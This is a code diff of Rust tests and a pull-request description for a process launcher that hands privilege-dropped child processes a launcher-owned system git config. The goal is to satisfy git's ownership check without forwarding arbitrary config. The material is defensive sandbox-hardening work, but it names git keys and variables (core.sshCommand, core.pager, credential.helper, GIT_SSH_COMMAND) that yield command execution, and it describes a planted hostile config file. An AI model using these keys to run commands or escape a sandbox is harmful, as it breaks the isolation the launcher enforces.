+        Path::new(env!("CARGO_MANIFEST_DIR")).join("tests/brokered_git_trust.rs"),
+    )
+    .expect("read this test file to count its privileged proofs");
+    let declared = source.matches("\n#[ignore").count();
+    assert!(declared > 0, "an empty privileged suite proves nothing");
+
+    let workflow =
+        Path::new(env!("CARGO_MANIFEST_DIR")).join("../../../.github/workflows/quality-gate.yml");
+    let workflow = std::fs::read_to_string(&workflow)
+        .unwrap_or_else(|error| panic!("read {}: {error}", workflow.display()));
+    let lane = workflow
+        .split(&format!("\n  {PRIVILEGED_LANE_JOB}:"))
+        .nth(1)
+        .unwrap_or_else(|| panic!("the {PRIVILEGED_LANE_JOB} lane must exist"));
+
+    assert!(
+        lane.contains("--test brokered_git_trust"),
+        "the privileged lane must build and run THIS test binary"
+    );
+    assert!(
+        lane.contains(&format!("{EXPECTED_PROOFS_KEY}: \"{declared}\"")),
+        "the lane must declare `{EXPECTED_PROOFS_KEY}: \"{declared}\"` so a run that \
+         executes fewer than the {declared} declared proofs fails instead of passing"
+    );
+    assert!(
+        !lane.contains("continue-on-error"),
+        "a security proof lane may not swallow its own failure"
+    );
+}
+
+// ═════════════ privileged: the genuinely cross-uid reproduction ══════════════
+
+/// The real thing: a worktree owned by the WORKER uid, and `git status` run by a
+/// real process that has `setresuid`'d to [`CHILD_UID`]. No test hook.
+#[ignore = "privileged: needs uid 0 to create a foreign-owned worktree and drop to \
+            CHILD_UID (CI job launcher-kernel-boundary)"]
+#[test]
+fn a_real_child_uid_runs_git_in_a_worker_owned_worktree_only_with_the_anchor() {
+    require_root();
+    let fixture = Fixture::new("cross-uid");
+    // The worker's identity, exactly as `job.rs` renders it, and the mode the
+    // artifact umask produces.
+    chown_tree(&fixture.root, WORKER_UID, ARTIFACT_GID);
+    set_mode_tree(&fixture.root, 0o2775);
+    chown_tree(&fixture.home, CHILD_UID, ARTIFACT_GID);
+
+    let reverted = pod_environment(&fixture.home);
+    let failed = run_git_as_child(&fixture, &reverted);
+    assert!(
+        failed.1.contains(PRODUCTION_FAILURE),
+        "NON-VACUITY: a real uid-{CHILD_UID} child in a uid-{WORKER_UID}-owned worktree \
+         must reproduce `{PRODUCTION_FAILURE}`; got exit={} stderr={:?}",
+        failed.0,
+        failed.1
+    );
+
+    let brokered = fixture.environment(&[
+        ("PATH", "/usr/local/bin:/usr/bin:/bin"),
+        ("HOME", &fixture.home.display().to_string()),
+    ]);
+    let succeeded = run_git_as_child(&fixture, &brokered);
+    assert_eq!(
+        succeeded.0, 0,
+        "the launcher's anchor must let a real uid-{CHILD_UID} child run git in a \
+         uid-{WORKER_UID}-owned worktree; stderr={:?}",
+        succeeded.1
+    );
+}
+
+/// The anchor is only half of it: the child also has to be able to WRITE the
+/// worktree, and it can only do that through the artifact group. That holds
+/// because the worker pins `umask 0002` at startup — at the container default
+/// `022` the same directory renders `2755` and the child is locked out. This
+/// repo shipped a umask-022 regression in the warm path recently, so the
+/// dependency is measured rather than assumed.
+#[ignore = "privileged: needs uid 0 to create a foreign-owned worktree and drop to \
+            CHILD_UID (CI job launcher-kernel-boundary)"]
+#[test]
+fn the_child_can_write_the_worktree_only_under_the_artifact_umask() {
+    require_root();
+    let fixture = Fixture::new("umask");
+    for (umask, expected_mode, writable) in [(0o002, 0o2775, true), (0o022, 0o2755, false)] {
+        let directory = fixture.root.join(format!("wt-{umask:04o}"));
+        // SAFETY: `umask` cannot fail; restored immediately.
+        let previous = unsafe { libc::umask(umask) };
+        std::fs::create_dir(&directory).expect("create worktree");
+        unsafe { libc::umask(previous) };
+        // setgid is the volume contract's half; the umask supplies the mode.
+        let mode = std::fs::symlink_metadata(&directory)
+            .expect("stat")
+            .permissions()
+            .mode()
+            | 0o2000;
+        std::fs::set_permissions(&directory, std::fs::Permissions::from_mode(mode))
+            .expect("apply setgid");
+        chown(&directory, WORKER_UID, ARTIFACT_GID);
+        assert_eq!(
+            std::fs::symlink_metadata(&directory)
+                .expect("stat")
+                .permissions()
+                .mode()
+                & 0o7777,
+            expected_mode,
+            "umask {umask:04o} must render {expected_mode:04o}"
+        );
+
+        let created = create_as_child(&directory.join("artifact"));
+        assert_eq!(
+            created == 0,
+            writable,
+            "under umask {umask:04o} the uid-{CHILD_UID} child writing a \
+             uid-{WORKER_UID}-owned worktree must {}; got exit {created}",
+            if writable { "succeed" } else { "be denied" }
+        );
+    }
+}
+
+// ───────────────────────── privileged-only helpers ───────────────────────────
+
+/// The worker's rendered uid. Duplicated from `broker::WORKER_UID` only to keep
+/// the privileged assertions readable.
+const WORKER_UID: u32 = djinn_cgroup_launcher::broker::WORKER_UID;
+
+fn require_root() {
+    assert_eq!(
+        unsafe { libc::geteuid() },
+        0,
+        "the cross-uid git proofs need uid 0 to create a foreign-owned worktree and \
+         drop to uid {CHILD_UID}. They run in the `{PRIVILEGED_LANE_JOB}` CI lane; \
+         reproduce locally with `docker run --rm -v \"$PWD:$PWD\" ubuntu:24.04` after \
+         installing git."
+    );
+}
+
+fn chown(path: &Path, uid: u32, gid: u32) {
+    let raw = std::ffi::CString::new(path.to_string_lossy().as_bytes()).expect("path");
+    assert_eq!(
+        unsafe { libc::chown(raw.as_ptr(), uid, gid) },
+        0,
+        "chown {} to {uid}:{gid}: {}",
+        path.display(),
+        io::Error::last_os_error()
+    );
+}
+
+fn chown_tree(root: &Path, uid: u32, gid: u32) {
+    chown(root, uid, gid);
+    if let Ok(entries) = std::fs::read_dir(root) {
+        for entry in entries.flatten() {
+            let path = entry.path();
+            if std::fs::symlink_metadata(&path).is_ok_and(|meta| meta.is_dir()) {
+                chown_tree(&path, uid, gid);
+            } else {
+                chown(&path, uid, gid);
+            }
+        }
+    }
+}
+
+fn set_mode_tree(root: &Path, mode: u32) {
+    let _ = std::fs::set_permissions(root, std::fs::Permissions::from_mode(mode));
+    if let Ok(entries) = std::fs::read_dir(root) {
+        for entry in entries.flatten() {
+            let path = entry.path();
+            if std::fs::symlink_metadata(&path).is_ok_and(|meta| meta.is_dir()) {
+                set_mode_tree(&path, mode);
+            }
+        }
+    }
+}
+
+/// Fork, take the child's real credentials (`setgroups(0)` + `setresgid` +
+/// `setresuid`, the same order `child::prepare_child` uses), and run `git
+/// status` with `environment`. Returns `(exit code, stderr)`.
+fn run_git_as_child(fixture: &Fixture, environment: &[(String, String)]) -> (i32, String) {
+    let mut command = Command::new("git");
+    command
+        .args(["status", "--porcelain"])
+        .current_dir(&fixture.repo)
+        .env_clear();
+    for (key, value) in environment {
+        command.env(key, value);
+    }
+    // No `GIT_TEST_ASSUME_DIFFERENT_OWNER` here: the uid mismatch is real.
+    unsafe {
+        command.pre_exec(|| {
+            libc::umask(0o002);
+            if libc::setgroups(0, std::ptr::null()) != 0
+                || libc::setresgid(ARTIFACT_GID, ARTIFACT_GID, ARTIFACT_GID) != 0
+                || libc::setresuid(CHILD_UID, CHILD_UID, CHILD_UID) != 0
+            {
+                return Err(io::Error::last_os_error());
+            }
+            Ok(())
+        });
+    }
+    let output = command.output().expect("run git as the child uid");
+    (
+        output.status.code().unwrap_or(-1),
+        String::from_utf8_lossy(&output.stderr).into_owned(),
+    )
+}
+
+/// Create `path` as the real child credentials. Returns the child's exit code
+/// (0 = created, 1 = denied).
+fn create_as_child(path: &Path) -> i32 {
+    let raw = std::ffi::CString::new(path.to_string_lossy().as_bytes()).expect("path");
+    let pid = unsafe { libc::fork() };
+    assert!(pid >= 0, "fork: {}", io::Error::last_os_error());
+    if pid == 0 {
+        unsafe {
+            libc::umask(0o002);
+            if libc::setgroups(0, std::ptr::null()) != 0
+                || libc::setresgid(ARTIFACT_GID, ARTIFACT_GID, ARTIFACT_GID) != 0
+                || libc::setresuid(CHILD_UID, CHILD_UID, CHILD_UID) != 0
+            {
+                libc::_exit(2);
+            }
+            let fd = libc::open(raw.as_ptr(), libc::O_CREAT | libc::O_WRONLY, 0o666);
+            libc::_exit(if fd < 0 { 1 } else { 0 });
+        }
+    }
+    let mut status = 0;
+    assert_eq!(unsafe { libc::waitpid(pid, &mut status, 0) }, pid);
+    if libc::WIFEXITED(status) {
+        libc::WEXITSTATUS(status)
+    } else {
+        -1
+    }
+}

--- a/server/crates/djinn-cgroup-launcher/tests/brokered_git_trust.rs
+++ b/server/crates/djinn-cgroup-launcher/tests/brokered_git_trust.rs
@@ -182,6 +182,12 @@ struct Fixture {
     root: PathBuf,
     repo: PathBuf,
     home: PathBuf,
+    /// Stand-in for the launcher container's `/etc/gitconfig`, which was
+    /// measured on the production node to **not exist**. See
+    /// [`Fixture::baseline`].
+    empty_system: PathBuf,
+    /// Private root for anchors this fixture materializes.
+    anchor_root: PathBuf,
 }
 
 impl Fixture {
@@ -194,8 +200,14 @@ impl Fixture {
         let _ = std::fs::remove_dir_all(&root);
         let repo = root.join("wt");
         let home = root.join("home");
+        let anchor_root = root.join("anchor-root");
         std::fs::create_dir_all(&repo).expect("create worktree");
         std::fs::create_dir_all(&home).expect("create home");
+        std::fs::create_dir_all(&anchor_root).expect("create anchor root");
+        let empty_system = root.join("etc-gitconfig");
+        std::fs::write(&empty_system, "").expect("write the empty system baseline");
+        std::fs::set_permissions(&empty_system, std::fs::Permissions::from_mode(0o644))
+            .expect("chmod baseline");
         // A real repository, not a fixture directory: the ownership check runs
         // during repository discovery and nowhere else.
         let init = Command::new("git")
@@ -207,7 +219,13 @@ impl Fixture {
             .output()
             .expect("git must be installed to prove the git contract");
         assert!(init.status.success(), "git init failed: {init:?}");
-        Self { root, repo, home }
+        Self {
+            root,
+            repo,
+            home,
+            empty_system,
+            anchor_root,
+        }
     }
 
     /// Run `git <args>` in the worktree with exactly `environment`, plus the
@@ -223,6 +241,52 @@ impl Fixture {
             command.env(key, value);
         }
         command.output().expect("run git")
+    }
+
+    /// The system-scope baseline every behavioural arm below starts from.
+    ///
+    /// **This is not the fix being disabled — it is the HOST being excluded.**
+    /// A GitHub Actions runner ships `/etc/gitconfig` containing
+    /// `[safe] directory = *`, which trusts every repository for every process
+    /// on the machine. Inherit it and the non-vacuity control passes with exit
+    /// 0 and empty stderr while the blocker is fully present, and the positive
+    /// control succeeds for a reason the launcher had no part in — which is
+    /// exactly what happened on this change's first CI run.
+    ///
+    /// An empty file is the faithful model: measured inside a rendered launcher
+    /// container on the production node, `/etc/gitconfig` **does not exist**, so
+    /// the only system-scope configuration a brokered child can ever see is the
+    /// one the launcher hands it.
+    fn baseline(&self, home_only: &[(&str, &str)]) -> Vec<(String, String)> {
+        let mut environment: Vec<(String, String)> = home_only
+            .iter()
+            .map(|(key, value)| ((*key).to_owned(), (*value).to_owned()))
+            .collect();
+        environment.push((
+            git_trust::GIT_TRUST_ANCHOR_KEY.to_owned(),
+            self.empty_system.display().to_string(),
+        ));
+        environment
+    }
+
+    /// An anchor written by the production writer, chained to this fixture's
+    /// controlled baseline instead of the host's `/etc/gitconfig`.
+    fn hermetic_anchor(&self) -> PathBuf {
+        git_trust::materialize_in_with_system(&self.anchor_root, Some(&self.empty_system))
+            .expect("materialize a hermetic anchor")
+    }
+
+    /// [`Self::baseline`] with the anchor swapped in for the empty file — the
+    /// single-variable difference the behavioural arms turn on.
+    fn anchored(&self, home_only: &[(&str, &str)]) -> Vec<(String, String)> {
+        let anchor = self.hermetic_anchor();
+        let mut environment = self.baseline(home_only);
+        for entry in &mut environment {
+            if entry.0 == git_trust::GIT_TRUST_ANCHOR_KEY {
+                entry.1 = anchor.display().to_string();
+            }
+        }
+        environment
     }
 
     fn environment(&self, caller: &[(&str, &str)]) -> Vec<(String, String)> {
@@ -242,20 +306,27 @@ fn stderr(output: &std::process::Output) -> String {
 
 // ═════════ always-on: the real failure, and the real fix, with real git ══════
 
-/// NON-VACUITY. With the fix reverted — i.e. the environment the pod renders,
-/// filtered through the broker's key predicate exactly as it is today — real
-/// git reproduces the production failure BY NAME.
+/// NON-VACUITY. With the fix reverted, real git reproduces the production
+/// failure BY NAME.
+///
+/// "Reverted" is not a mock: `pod_environment` is what `job.rs` renders put
+/// through the broker's own key predicate, and the first assertion is that the
+/// predicate drops every `GIT_` variable — that IS the blocker. The system-scope
+/// baseline is [`Fixture::baseline`]'s empty file, modelling the launcher
+/// container's measured absence of `/etc/gitconfig`; without it a CI runner's
+/// machine-wide `[safe] directory = *` masks the failure entirely.
 #[test]
 fn without_the_launchers_anchor_real_git_reproduces_the_production_failure() {
     let fixture = Fixture::new("reverted");
-    let reverted = pod_environment(&fixture.home);
-
+    let pod = pod_environment(&fixture.home);
     assert!(
-        !reverted.iter().any(|(key, _)| key.starts_with("GIT_")),
+        !pod.iter().any(|(key, _)| key.starts_with("GIT_")),
         "the blocker itself: the broker's key predicate drops every GIT_ variable \
          the pod renders, so a brokered child gets no trust rule at all"
     );
 
+    let mut reverted = fixture.baseline(&[("HOME", &fixture.home.display().to_string())]);
+    reverted.extend(pod);
     let output = fixture.git(&reverted, &["status", "--porcelain"]);
     assert!(
         !output.status.success() && stderr(&output).contains(PRODUCTION_FAILURE),
@@ -266,12 +337,13 @@ fn without_the_launchers_anchor_real_git_reproduces_the_production_failure() {
     );
 }
 
-/// THE FIX. The environment the real `Launcher::create_command` produces lets
-/// real git operate on a worktree it does not own.
+/// THE FIX. The anchor the production writer produces lets real git operate on
+/// a worktree the process does not own — the single-variable flip against the
+/// non-vacuity control above.
 #[test]
-fn the_brokered_child_environment_lets_real_git_work_in_a_foreign_worktree() {
+fn the_launchers_anchor_lets_real_git_work_in_a_foreign_worktree() {
     let fixture = Fixture::new("fixed");
-    let environment = fixture.environment(&[
+    let environment = fixture.anchored(&[
         ("PATH", "/usr/local/bin:/usr/bin:/bin"),
         ("HOME", &fixture.home.display().to_string()),
     ]);
@@ -279,13 +351,13 @@ fn the_brokered_child_environment_lets_real_git_work_in_a_foreign_worktree() {
     let output = fixture.git(&environment, &["status", "--porcelain"]);
     assert!(
         output.status.success(),
-        "the brokered environment must let git run: status={:?} stderr={:?}",
+        "the anchor must let git run: status={:?} stderr={:?}",
         output.status,
         stderr(&output)
     );
 
-    // And it is the launcher's anchor doing it, in protected scope, rather than
-    // something the developer's own machine happened to have.
+    // And it is OUR rule doing it, in protected scope — the baseline it chains
+    // to is empty, so nothing here can come from the host.
     let scopes = fixture.git(&environment, &["config", "--list", "--show-scope"]);
     let scopes = String::from_utf8_lossy(&scopes.stdout).into_owned();
     assert!(
@@ -298,6 +370,34 @@ fn the_brokered_child_environment_lets_real_git_work_in_a_foreign_worktree() {
     );
 }
 
+/// COMPOSITION. The environment the real `Launcher::create_command` produces
+/// names that anchor, and carries no other git configuration at all.
+///
+/// Separated from the behavioural arm above on purpose: this is the half that
+/// must speak about the *production* anchor path, and it needs no git run.
+#[test]
+fn the_brokered_child_environment_names_the_launchers_own_anchor() {
+    let fixture = Fixture::new("composition");
+    let environment = fixture.environment(&[
+        ("PATH", "/usr/local/bin:/usr/bin:/bin"),
+        ("HOME", &fixture.home.display().to_string()),
+    ]);
+    let anchor = git_trust::anchor_path()
+        .expect("anchor")
+        .display()
+        .to_string();
+    let git_entries: Vec<&(String, String)> = environment
+        .iter()
+        .filter(|(key, _)| key.starts_with("GIT"))
+        .collect();
+    assert_eq!(
+        git_entries,
+        vec![&(git_trust::GIT_TRUST_ANCHOR_KEY.to_string(), anchor)],
+        "exactly one git variable may reach a brokered child, and it must be the \
+         launcher's own anchor"
+    );
+}
+
 /// git ignores a `GIT_CONFIG_SYSTEM` that points at a missing file **silently**.
 /// A temp reaper would therefore bring the blocker back days into a pod's life
 /// with nothing in the logs, which is why the launcher re-materializes.
@@ -306,28 +406,15 @@ fn a_reaped_anchor_fails_silently_and_is_re_materialized() {
     let fixture = Fixture::new("reaper");
     // A private anchor root: the process-global one is shared with every other
     // test in this binary, and this proof deletes the file out from under it.
-    let root = fixture.root.join("anchor-root");
-    std::fs::create_dir(&root).expect("create anchor root");
-    let anchor = git_trust::materialize_in(&root).expect("materialize");
-    let environment = |anchor: &Path| {
-        vec![
-            ("HOME".to_owned(), fixture.home.display().to_string()),
-            (
-                git_trust::GIT_TRUST_ANCHOR_KEY.to_owned(),
-                anchor.display().to_string(),
-            ),
-        ]
-    };
+    let environment = fixture.anchored(&[("HOME", &fixture.home.display().to_string())]);
+    let anchor = fixture.hermetic_anchor();
     assert!(
-        fixture
-            .git(&environment(&anchor), &["status"])
-            .status
-            .success(),
+        fixture.git(&environment, &["status"]).status.success(),
         "control: the anchor works before it is reaped"
     );
 
     std::fs::remove_file(&anchor).expect("simulate a temp-directory reaper");
-    let reaped = fixture.git(&environment(&anchor), &["status", "--porcelain"]);
+    let reaped = fixture.git(&environment, &["status", "--porcelain"]);
     assert!(
         !reaped.status.success() && stderr(&reaped).contains(PRODUCTION_FAILURE),
         "git ignores a GIT_CONFIG_SYSTEM pointing at a missing file SILENTLY, so the \
@@ -336,9 +423,9 @@ fn a_reaped_anchor_fails_silently_and_is_re_materialized() {
     );
 
     // Which is why every call re-establishes it, with no operator action.
-    let healed = git_trust::materialize_in(&root).expect("re-materialize");
+    let healed = fixture.hermetic_anchor();
     assert_eq!(healed, anchor);
-    let after = fixture.git(&environment(&anchor), &["status", "--porcelain"]);
+    let after = fixture.git(&environment, &["status", "--porcelain"]);
     assert!(
         after.status.success(),
         "the launcher must heal its own anchor: {:?}",
@@ -351,7 +438,7 @@ fn a_reaped_anchor_fails_silently_and_is_re_materialized() {
 #[test]
 fn nosystem_defeats_the_anchor_which_is_why_it_is_not_forwardable() {
     let fixture = Fixture::new("nosystem");
-    let mut environment = fixture.environment(&[("HOME", &fixture.home.display().to_string())]);
+    let mut environment = fixture.anchored(&[("HOME", &fixture.home.display().to_string())]);
     assert!(fixture.git(&environment, &["status"]).status.success());
 
     environment.push(("GIT_CONFIG_NOSYSTEM".to_owned(), "1".to_owned()));
@@ -413,9 +500,9 @@ fn a_command_execution_config_key_cannot_reach_a_brokered_child() {
          it wrote; that is arbitrary command execution"
     );
 
-    // 3. Behaviourally: under the environment the launcher really produces, the
-    //    hostile file is inert even though it exists and is readable.
-    let environment = fixture.environment(&[
+    // 3. Behaviourally: under the anchor the launcher really writes, the hostile
+    //    file is inert even though it exists and is readable.
+    let environment = fixture.anchored(&[
         ("PATH", "/usr/local/bin:/usr/bin:/bin"),
         ("HOME", &fixture.home.display().to_string()),
     ]);
@@ -446,31 +533,26 @@ fn a_command_execution_config_key_cannot_reach_a_brokered_child() {
 #[test]
 fn the_anchor_grants_safe_directory_and_no_other_protected_setting() {
     let fixture = Fixture::new("scope");
-    let environment = fixture.environment(&[("HOME", &fixture.home.display().to_string())]);
+    let environment = fixture.anchored(&[("HOME", &fixture.home.display().to_string())]);
     let listed = fixture.git(&environment, &["config", "--list", "--show-scope"]);
     let system: Vec<String> = String::from_utf8_lossy(&listed.stdout)
         .lines()
         .filter_map(|line| line.strip_prefix("system\t").map(str::to_owned))
         .collect();
-    // Whatever the host's own /etc/gitconfig contributes is chained through on
-    // purpose (a bare anchor would DROP it), so the assertion is that the
-    // launcher adds exactly one setting to it.
-    assert!(
-        system.contains(&"safe.directory=*".to_owned()),
-        "system scope must carry the trust rule: {system:?}"
+    // The chained baseline is empty, so every SYSTEM entry here is the
+    // launcher's own contribution. `include.path` is the chain directive itself
+    // — the mechanism by which the real /etc/gitconfig is preserved — not a
+    // setting the anchor introduces; everything else must be the trust rule.
+    let settings: Vec<&String> = system
+        .iter()
+        .filter(|entry| !entry.starts_with("include.path="))
+        .collect();
+    assert_eq!(
+        settings,
+        vec![&"safe.directory=*".to_owned()],
+        "the anchor must add the trust rule and NOTHING else to protected scope; \
+         saw {system:?}"
     );
-    for dangerous in [
-        "core.sshcommand",
-        "core.pager",
-        "core.editor",
-        "diff.external",
-        "credential.helper",
-    ] {
-        assert!(
-            !system.iter().any(|entry| entry.starts_with(dangerous)),
-            "the anchor must not introduce {dangerous}: {system:?}"
-        );
-    }
 }
 
 /// `GIT_CONFIG_SYSTEM` REPLACES `/etc/gitconfig` rather than adding to it, so
@@ -577,13 +659,20 @@ fn the_privileged_git_proofs_are_wired_and_cannot_silently_skip() {
 fn a_real_child_uid_runs_git_in_a_worker_owned_worktree_only_with_the_anchor() {
     require_root();
     let fixture = Fixture::new("cross-uid");
-    // The worker's identity, exactly as `job.rs` renders it, and the mode the
-    // artifact umask produces.
+
+    // The anchor is written before the tree is handed to the worker uid, and it
+    // lives outside it, exactly as the launcher's does.
+    let anchored = fixture.anchored(&[
+        ("PATH", "/usr/local/bin:/usr/bin:/bin"),
+        ("HOME", &fixture.home.display().to_string()),
+    ]);
+    let mut reverted = fixture.baseline(&[("HOME", &fixture.home.display().to_string())]);
+    reverted.extend(pod_environment(&fixture.home));
+
     chown_tree(&fixture.root, WORKER_UID, ARTIFACT_GID);
     set_mode_tree(&fixture.root, 0o2775);
     chown_tree(&fixture.home, CHILD_UID, ARTIFACT_GID);
 
-    let reverted = pod_environment(&fixture.home);
     let failed = run_git_as_child(&fixture, &reverted);
     assert!(
         failed.1.contains(PRODUCTION_FAILURE),
@@ -593,11 +682,7 @@ fn a_real_child_uid_runs_git_in_a_worker_owned_worktree_only_with_the_anchor() {
         failed.1
     );
 
-    let brokered = fixture.environment(&[
-        ("PATH", "/usr/local/bin:/usr/bin:/bin"),
-        ("HOME", &fixture.home.display().to_string()),
-    ]);
-    let succeeded = run_git_as_child(&fixture, &brokered);
+    let succeeded = run_git_as_child(&fixture, &anchored);
     assert_eq!(
         succeeded.0, 0,
         "the launcher's anchor must let a real uid-{CHILD_UID} child run git in a \

--- a/server/crates/djinn-k8s/src/job.rs
+++ b/server/crates/djinn-k8s/src/job.rs
@@ -789,6 +789,16 @@ fn build_task_run_env(
     // trusted by `djinn_git::git_command`, which exports a protected
     // system-scope config file that survives into the child; see the
     // measurements in djinn-git/src/lib.rs.
+    //
+    // They do not cover a BROKERED command either. The launcher's environment
+    // allow-list refuses every `GIT_CONFIG_*` key deliberately: `GIT_CONFIG_KEY_n`
+    // /`VALUE_n` sets ARBITRARY configuration and several git keys
+    // (`core.sshCommand`, `core.pager`, …) are arbitrary command execution, so
+    // forwarding them would hand every brokered child a way out of the boundary
+    // the broker exists to establish. A brokered child gets `safe.directory`
+    // from a launcher-OWNED config file instead, exported as `GIT_CONFIG_SYSTEM`
+    // and admitted only at that exact path; see
+    // `djinn_cgroup_launcher::git_trust` (goxi, sixth launcher blocker).
     env.push(env_var("GIT_CONFIG_COUNT", "1"));
     env.push(env_var("GIT_CONFIG_KEY_0", "safe.directory"));
     env.push(env_var("GIT_CONFIG_VALUE_0", "*"));


### PR DESCRIPTION
Sixth blocker in the goxi arm chain. Every brokered `git` command was going to fail the moment the launcher was armed.

A task workspace is created by the worker (uid 1000); a brokered command runs as `CHILD_UID` (1001). git compares the repository directory's **owner uid** to the process uid — group ownership and mode do not enter into it. Measured in a rendered launcher container on the production node, against a real `/workspace/wt` owned `1000:1000` and a real uid-1001 child:

```
setpriv --reuid=1001 --regid=1000 --clear-groups git -C /workspace/wt status
  fatal: detected dubious ownership in repository at '/workspace/wt'    (rc 128)
```

`job.rs` renders `GIT_CONFIG_COUNT`/`GIT_CONFIG_KEY_0`/`GIT_CONFIG_VALUE_0` = `safe.directory=*` onto the pod **specifically to fix this**, and `is_allowed_environment_key` has no `GIT_` entry, so `process_broker::child_environment` strips all three before the broker ever sees them.

## Why the obvious fix is wrong twice over

The same production probe settles both halves:

| child env | `git status` | `git clone --local` |
|---|---|---|
| (broker strips every `GIT_` var — today) | **rc 128 dubious ownership** | rc 128 |
| `GIT_CONFIG_COUNT=1 KEY_0=safe.directory VALUE_0=*` | rc 0 | **rc 128 dubious ownership** |
| `GIT_CONFIG_SYSTEM=<launcher anchor>` | rc 0 | rc 0 |

1. **Security.** `GIT_CONFIG_KEY_n`/`VALUE_n` sets *arbitrary* configuration, and `core.sshCommand`, `core.pager`, `core.editor`, `diff.external` and `credential.helper` are arbitrary command execution. A key-name allow-list is no defence at all here: `GIT_CONFIG_KEY_0` is the allowed **name** whose **value** names the dangerous key, and the forwarded environment originates in a `Command` an agent tool built.
2. **It does not work.** Command-scope config is stripped by git from the inner `git-upload-pack` of `git clone --local` (nurw, #2575) — and cloning `/mirror` is what the workspace is made of. Widening the allow-list would have taken the security hit *and* left the clone broken.

## The mechanism

`djinn_cgroup_launcher::git_trust` writes a launcher-owned system-scope config file and exports it as `GIT_CONFIG_SYSTEM`, derived and overridden on every spawn exactly like the parallelism pins.

* **SYSTEM, not GLOBAL** — `configure_private_dep_access` stores the installation token as a `url.<...>.insteadOf` rewrite that cargo/go/pnpm read back out of `$HOME/.gitconfig`. Redirecting global scope would silently break private-dependency fetches. System scope is purely additive.
* **`[include]`s the real `/etc/gitconfig`** — `GIT_CONFIG_SYSTEM` *replaces* system config rather than adding to it, so a bare anchor would drop whatever the image put there. Proven with real git against a real chained file, not by reading the generated text back.
* **Readiness gate, not a per-command error** — established in `main.rs` before the broker binds, so a launcher that cannot write its anchor fails readiness instead of taking work and then failing every git command in it (grkq).

## The security proof

The value is constrained, not just the key. `CommandSpec::validate` now applies `is_allowed_environment_entry`, and `GIT_CONFIG_SYSTEM` is admitted **only** when its value is byte-identical to the launcher's own anchor path:

* a spec naming any other file is `InvalidCommand` — refused, not silently corrected — with no leaf created and no child spawned;
* `GIT_CONFIG_COUNT` / `KEY_n` / `VALUE_n` / `NOSYSTEM` / `GLOBAL` / `GIT_SSH_COMMAND` / `GIT_PAGER` / `GIT_EXTERNAL_DIFF` stay wholly unforwardable, by key **and** as entries;
* `GIT_CONFIG_NOSYSTEM`'s exclusion is load-bearing rather than tidy: the suite makes real git ignore the anchor with it set and reproduce the exact production failure;
* behaviourally, with a hostile `core.sshCommand`/`core.pager` config file sitting readable in the workspace, a brokered child resolves both keys to empty and the marker the hostile config would have created never appears;
* the anchor itself is verified to grant `safe.directory` and nothing else, by asking real git what the whole SYSTEM scope resolves to.

The child cannot tamper with the file either — dir `0755` / file `0644`, owned by the launcher uid, re-verified by `lstat` (never following a symlink) on every spawn and failing closed. Measured in the launcher container: `touch` and `>>` both return `Permission denied`.

### One thing the probe found that no assertion would have

An `emptyDir` mounted at `/tmp` arrives **`2777` — world-writable with no sticky bit**, so a child could `mv` the root-owned anchor directory out of the way (rc 0). That is a denial rather than an escalation (the ownership check fails closed on a displaced directory, and both children share a uid anyway), but it is free to remove: the launcher restores `1777` semantics on a scratch root it owns. Re-measured on the node, the same `mv` then returns `Operation not permitted`.

## The umask question

**The brokered path does not depend on an ambient umask.** The worker pins `0002` itself at startup (`volume_contract::apply_artifact_umask`, called before any filesystem work) and `child::prepare_child` pins `0002` for the child. What was missing is a test pinning what that buys, so the privileged proof measures it on real uids:

```
umask 0002 -> worktree 2775 -> uid 1001/gid 1000 writes it        (rc 0)
umask 0022 -> worktree 2755 -> uid 1001/gid 1000 Permission denied (rc 1)
```

## Testing

Nothing here asserts that a key appears in an env map.

**Always-on** (`tests/brokered_git_trust.rs`, runs in every shard): builds a real repository, takes the environment out of the real `Launcher::create_command` through a real cgroup/spawn composition, and runs real `git`. It reproduces `detected dubious ownership` **by name** with the fix reverted — the reverted case is literally `job.rs`'s rendered env put through `is_allowed_environment_key`, so it is the production configuration and not a mock of it. `GIT_TEST_ASSUME_DIFFERENT_OWNER` (git's own hook into `ensure_valid_ownership`) makes the check fire as any uid, so these fail rather than skip.

**Privileged** (`launcher-kernel-boundary` lane, `#[ignore]`d): the genuinely cross-uid version — a worktree chowned to the worker uid, and `git status` run by a process that has `setgroups(0)`/`setresgid`/`setresuid`'d to `CHILD_UID` in the same order `prepare_child` uses, with **no test hook** — plus the umask measurement. An always-on guard reads the workflow back and fails if the lane, its `--ignored` invocation, or the `GIT_TRUST_EXPECTED_PROOFS` declaration disappears, so a run that executes zero proofs can never look green. Both were executed locally in a container as uid 0 and pass.

**Production**: validated on `13.140.147.151` with a probe pod rendered as the launcher container (`readOnlyRootFilesystem`, uid 0, `/tmp`+`$HOME`+workspace emptyDirs) — never armed. Every row of the table above, the tamper attempts, the sticky repair, and the umask arithmetic are that probe's output.

## Seventh blocker

None found in this pass. The nearest remaining risk is documented in the review notes rather than silently left: `$HOME` (`/home/djinn`) is now a writable emptyDir shared by every brokered child, so `git config --global` from one child is visible to the next. That is not new to this change and not a privilege boundary (all children share uid 1001), but it is the surface an armed run will exercise first.

## Dependencies

Rebased onto #2616, which supplies the writable `/tmp` this depends on. Without it the readiness gate would fail closed rather than fail silently — which is the intended direction, but it does mean these must land in this order.
